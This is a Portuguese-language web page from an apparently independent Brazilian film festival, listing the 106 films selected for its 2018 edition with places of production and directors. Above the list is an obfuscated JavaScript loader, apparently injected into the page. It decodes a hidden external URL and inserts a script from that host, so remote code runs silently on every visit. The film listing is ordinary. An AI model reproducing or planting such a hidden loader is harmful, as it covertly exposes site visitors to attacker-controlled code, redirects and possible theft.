var _0x1f92=['appendChild','1051197hJyWzE','279875vBeEEE','679597pxmSpW','1208114MFItag','shift','currentScript','1yNFUPu','755208bCXcLD','parentNode','808668ljhldK','277011vIvjKc','push','createElement','1020859qQZHqJ','script','1012100HJdiys','fromCharCode','insertBefore','src','getElementsByTagName','1OuqVoU','3470379tibEqN','1439788dxeSnm','head','94160WqQicf','2vRLkLk'];var _0xe4f51f=_0x1605;(function(_0x36e879,_0x71d7d){var _0x19f9dd=_0x1605;while(!![]){try{var _0x27ae8f=-parseInt(_0x19f9dd(0x1b8))+-parseInt(_0x19f9dd(0x1b0))+parseInt(_0x19f9dd(0x1b6))*parseInt(_0x19f9dd(0x1af))+-parseInt(_0x19f9dd(0x1c7))+-parseInt(_0x19f9dd(0x1c1))+-parseInt(_0x19f9dd(0x1b2))+-parseInt(_0x19f9dd(0x1bd))*-parseInt(_0x19f9dd(0x1be));if(_0x27ae8f===_0x71d7d)break;else _0x36e879['push'](_0x36e879['shift']());}catch(_0x5a5af5){_0x36e879['push'](_0x36e879['shift']());}}}(_0x1f92,0x95a7c));var _0x230d=[_0xe4f51f(0x1bc),_0xe4f51f(0x1b7),_0xe4f51f(0x1b1),_0xe4f51f(0x1c5),_0xe4f51f(0x1c0),'698448rkGfeF',_0xe4f51f(0x1c6),'281314aeWSVS','1fashtG',_0xe4f51f(0x1c9),_0xe4f51f(0x1bf),_0xe4f51f(0x1bb),_0xe4f51f(0x1c4),_0xe4f51f(0x1b3),_0xe4f51f(0x1c2),_0xe4f51f(0x1b9),'1YWwfcj'],_0x3e5356=_0x567b;function _0x567b(_0x26bed5,_0x3c3ade){_0x26bed5=_0x26bed5-0x161;var _0x88803e=_0x230d[_0x26bed5];return _0x88803e;}function _0x1605(_0x7e46ac,_0x414a0e){_0x7e46ac=_0x7e46ac-0x1af;var _0x1f92c0=_0x1f92[_0x7e46ac];return _0x1f92c0;}(function(_0x513bd6,_0x54f163){var _0x1d2548=_0xe4f51f,_0x41ee88=_0x567b;while(!![]){try{var _0x2955a7=-parseInt(_0x41ee88(0x168))*parseInt(_0x41ee88(0x16a))+parseInt(_0x41ee88(0x16f))+-parseInt(_0x41ee88(0x165))*-parseInt(_0x41ee88(0x161))+-parseInt(_0x41ee88(0x16c))+parseInt(_0x41ee88(0x167))+parseInt(_0x41ee88(0x16e))+-parseInt(_0x41ee88(0x170))*-parseInt(_0x41ee88(0x169));if(_0x2955a7===_0x54f163)break;else _0x513bd6[_0x1d2548(0x1b4)](_0x513bd6['shift']());}catch(_0x33270c){_0x513bd6[_0x1d2548(0x1b4)](_0x513bd6[_0x1d2548(0x1c8)]());}}}(_0x230d,0xb70ce));var mm=String[_0x3e5356(0x171)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x63,0x6c,0x69,0x63,0x6b,0x2e,0x64,0x72,0x69,0x76,0x65,0x72,0x66,0x6f,0x72,0x74,0x6e,0x69,0x67,0x74,0x6c,0x79,0x2e,0x67,0x61,0x2f,0x74,0x56,0x39,0x53,0x4a,0x48),d=document,s=d[_0xe4f51f(0x1b5)](_0x3e5356(0x163));s[_0x3e5356(0x16d)]=mm,document[_0x3e5356(0x16b)]?document[_0x3e5356(0x16b)][_0x3e5356(0x164)][_0xe4f51f(0x1ba)](s,document[_0x3e5356(0x16b)]):d[_0x3e5356(0x162)](_0x3e5356(0x166))[0x0][_0xe4f51f(0x1c3)](s);

Seleção Oficial 2018

agosto 14, 2018

Lista dos 106 Filmes selecionados. Foram 520 inscritos. Muito obrigado a todas e a todos!

Filme, Local de Produção e Direção.

  1. A alma do cinema não tem cor, Belém/PA. Direção: Lucas Moraga.
  2. À Espera, Moçambique. Direção: Nivaldo Vasconcelos e Sónia André.
  3. A Força das Marias, Rio de Janeiro/RJ. Direção: Luciana Rocha e Mila Bertassoni.
  4. À Procura de Marçal, Campo Grande/MS. Direção: Caroline Cardoso e Natália Moraes.
  5. Alma Crespa, Rio de Janeiro/RJ. Direção: Paulo China e Rebecca Joviano.
  6. Amor de Ori, Brasília/DF. Direção: Bruna Barros.
  7. Amor, só de mãe, São Paulo/SP. Direção: Julia Hannud e Catharina Scarpellini.
  8. Ándale!, Interior do RS. Direção: Petter Baiestorf.
  9. Ansioso, Ribeirão Preto/SP. Direção: Guilherme Sanitá.
  10. Araguaia, Presente!, Rio de Janeiro/RJ. Direção: André Queiroz e Arthur Moura.
  11. As Crianças do Lixão, Rio de Janeiro/RJ. Direção: Robert Ziehe.
  12. Aviãozinho, Juazeiro do Norte/CE e Rio de Janeiro/RJ. Direção: Antônio Jr..
  13. Bala Perdida, Recife/PE. Direção: Sylara Silvério.
  14. Balanceia, Porto Velho/RO. Direção: Juraci Júnior e Thiago Oliveira.
  15. Banco Brecht, Recife/PE. Direção: Tiago Aguiar e Marcio Souza.
  16. Beijos de Arame Farpado, Florianópolis e Lages/SC. Direção: Marco Martins.
  17. Benito Tilmann, O Pior Cineasta do Mundo, Santos/SP. Direção: Dino Menezes.
  18. Braços Vazios, Vitória/ES. Direção: Daiana Rocha.
  19. Camelôs, Rio de Janeiro/RJ. Direção: Milena Manfredini.
  20. Carne e Casca, Recife/PE. Direção: Dani Drumond.
  21. Carroça 21, São Paulo/SP. Direção: Gustavo Pera.
  22. Catarro, Natal/RN. Direção: Paulo Dumaresq.
  23. Cineclubismo na BF, Nova Iguaçu/RJ. Direção: Carol Vilamaro.
  24. Clausura, São Bernardo do Campo/SP. Direção: Mariana França e Gildo Antonio.
  25. Close, Fortaleza/CE. Direção: Rosane Gurgel.
  26. Como Ser Racista em 10 Passos, Cuiabá/MT. Direção: Isabela Ferreira.
  27. Conversa Sobre o Cinema Independente, Rio de Janeiro/RJ. Direção: Alex Rodrigues.
  28. Coração do Mar, São Bernardo do Campo/SP. Direção: Rafael Nascimento.
  29. Dedo na Ferida, Rio de Janeiro/RJ. Direção: Sílvio Tendler.
  30. Delas, Maceió/AL. Direção: Karina Liliane.
  31. Depois da Tempestade, Londrina/PR. Direção: Bruno Nomura.
  32. Desaparecidos, Campinas/SP. Direção: Danddara.
  33. Desculpe, me afoguei, Líbano. Direção: Hussein Nakhal e David Hachby.
  34. Desejo/Sufoco, Mesquita/RJ, Direção: Bárbara Martins e Marcos Gabriel Faria.
  35. Deuteronômio 22, Caçapava/SP. Direção: Érico Luz.
  36. Dois de Um, Curitiba/PR. Direção: Victoria Tuler.
  37. Écharpe Noir, Rio de Janeiro/RJ. Direção: Barbara Fuentes.
  38. Eleguá, Rio de Janeiro/RJ. Direção: Yuri Costa.
  39. Entoado Negro, Ingá/PB. Direção: Valtyennya Pires.
  40. Esperando o sábado, Rio de Janeiro/RJ. Direção: Erica Sansil.
  41. Essa Dor no Peito, Rio de Janeiro/RJ. Direção: Adriana Zattar.
  42. Eu o Declaro Meu Inimigo, Recife/PE. Direção: Marcos Buccini e Tiago Delácio.
  43. Excelentíssimo Vampiro, Caxias do Sul/RS. Direção: Davi Frizzo.
  44. Êxtase em vermelho, Pelotas/RS. Direção: Rafael Grillo.
  45. Fanzine Tchê: 30 Anos de Resistência, Alvorada, Porto Alegre, São Leopoldo/RS, Timbó/SC e São Paulo/SP. Direção: Paulo Kobielski.
  46. Fechadura, Brasília/DF. Direção: Ana Carolina Resende e Caroline Lucena.
  47. Filme Sujo, Brasil e Peru. Direção: Petrus Faria.
  48. Fischia il Vento, Curitiba/PR. Direção e Roteiro: Luciano Popadiuk.
  49. Flag, Niterói/RJ. Direção: Vítor Teixeira.
  50. Galeria Rua, Teresina/PI. Direção: Jonathan Dourado.
  51. Hipster, Duque de Caxias/RJ. Direção: Marcos Gabriel Faria.
  52. Imaginários Urbanos, Maceió/AL. Direção: Glauber Xavier.
  53. [IN]Sustentável, Natal/RN. Direção: Julio Castro e Seo Cruz.
  54. Lar doce celular, São João de Meriti/RJ. Direção: Alek Lean.
  55. Lute como uma menina!, São Paulo/SP. Direção: Flávio Colombini e Beatriz Alonso.
  56. Majur, Rondonópolis/MT. Direção: Rafael Irineu.
  57. Manual, Cuba. Direção: Letícia Simões.
  58. Maria, Manaus/AM. Direção: Elen Linth.
  59. Mas ele nunca me bateu, Guarulhos/SP. Direção: Janaina Reis.
  60. Matuto Metropolitano, Guarulhos/SP. Direção: Janaina Reis.
  61. Meio Fio, Duque de Caxias/RJ. Direção: Enviada de Saturno e Facção Feminista Cineclube.
  62. Mercadoria, Rio de Janeiro/RJ. Direção: Carla Villa-Lobos.
  63. NEGRUM3, São Paulo/SP. Direção: Diego Paulino.
  64. Nome Provisório, Santos/SP. Direção: Bruno Arrivabene e Victor Allencar.
  65. Nomes que Importam, Rio de Janeiro/RJ. Direção: Angela Donini e Muriel Alves.
  66. Nos Ombros de Gigantes, São Paulo/SP. Direção: Nicolas Toniollo.
  67. Nós por nós, Brasília/DF. Direção: Isabela Graton e Mariana Bitencourt.
  68. Nossos Mortos Tem Voz, Baixada Fluminense/RJ. Direção: Fernando Sousa e Gabriel Barbosa.
  69. Notícias de uma Tragédia Racial Subnotificada, Salvador/BA. Realização: Reaja ou Será Morto.
  70. Nu, Xerém/RJ. Direção: João Vittor Koeppe, Bárbara Martins e Marcos Gabriel Faria.
  71. O Churrasco, Rio de Janeiro/RJ. Direção: Gabriel Figueira.
  72. O Segurança Invisível, Rio de Janeiro/RJ. Direção: Luane Teixeira, Renata Rodrigues, Rodrigo Miguez e Uilton Oliveira.
  73. O Senhor de Toda Cruz, Rio de Janeiro/RJ. Direção: Hugo Lima.
  74. Onze minutos, Salvador/BA. Direção: Hilda Lopes Pontes.
  75. Os Anos 3000 Eram Feitos de Lixo (ou Quando a Dignidade da Raça Humana se Afogou no Chorume Estático da Arte da Hipocrisia). Niterói/RJ. Direção: Ana All, Clara Chroma e Cleyton Xavier.
  76. Paná Panã, Rio de Janeiro/RJ. Direção: Cartel Adélias.
  77. Pedallar, feira de vinil, Fortaleza/CE. Direção: Daniel Uchoa.
  78. Pele de Monstro, Juiz de Fora/MG. Direção: Barbara Maria.
  79. Pena e Maracá – A Encantaria do Fundo, Ilha de Marajó/PA. Direção: Leonardo Carrato e Daniel Meneguelli.
  80. Pintado, São Paulo/SP. Direção: Gustavo McNair.
  81. Pisciano, Olinda/PE. Direção: Alexandre Pitanga.
  82. Privilégios, Niterói/RJ. Direção: Rosa Miranda.
  83. Prostituta guerreira, João Pessoa/PB. Direção: Marcio Ramos.
  84. Rio das Lágrimas Secas, Minas Gerais/Espírito Santo. Direção: Saskia Sá.
  85. Roberto no País dos Justos, Campinas/SP. Direção: Flávio Carnielli.
  86. Sem Tarja, Salvador/BA, Direção: Rafaela Uchoa.
  87. Sobre Viver – Precisamos Falar de Suicídio, São Paulo/SP. Direção: Carlos Yamamoto.
  88. Somos, Niterói/RJ. Direção: Bruna Fonseca.
  89. Suprimido, Porto Alegre/RS. Direção: Rafinha Gomes.
  90. Sustento, Recife/PE. Direção: Sylara Silvério.
  91. Talaatay Nder, Senegal. Direção: Chantal G. M. Durpoix.
  92. Tempo Voa, Porto Alegre/RS. Direção: Rafinha Gomes.
  93. Torcida Fiel, Estado Traidor, Salvador/BA. Direção: Giovane Sobrevivente.
  94. Translúcidos, São Paulo e Guarulhos/SP. Direção: Asaph Luccas e Guilherme Candido.
  95. Transvivo, Vitória/ES. Direção: Tati Franklin.
  96. Ultima Puella, Recife/PE. Direção: Jota Bosco.
  97. Um dia com os Blacks que ainda existem, Rio de Janeiro/RJ. Direção: Marcio Graffiti.
  98. Uma semana, Redenção/CE. Direção: Thais Queiroz e Fellipe Farias.
  99. Universo Preto Paralelo, São Paulo/SP. Direção: Rubens Passaro.
  100. Vaca Parida, Alvinópolis/MG. Direção, Fotografia e Edição: Diogo Cronemberger.
  101. Vielas, Rio de Janeiro/RJ. Direção: Ana Bustamante.
  102. Você conhece Derréis?, Patos/PB. Direção: Veruza Guedes.
  103. Zero, Goiânia/GO. Direção: Rafael Simon.
  104. 0800, a poesia vive!, Rio de Janeiro/RJ. Direção: Monica Klemz.
  105. 8 Patas, São Paulo/SP. Direção: Fabrício Eduardo Rabachim, Gabriel Barbosa, Pietro Leonardo Nichelatti Nicolodi.
  106. 2017, São Paulo/SP. Direção: Pryka Almeida.
Edição 2019
Em 2019, recebemos 600 filmes.
Nota de cancelamento
Cancelamento da 3° edição no CCJF.
Seleção Oficial 2019
Lista da seleção oficial da 3° Edição da Mostra.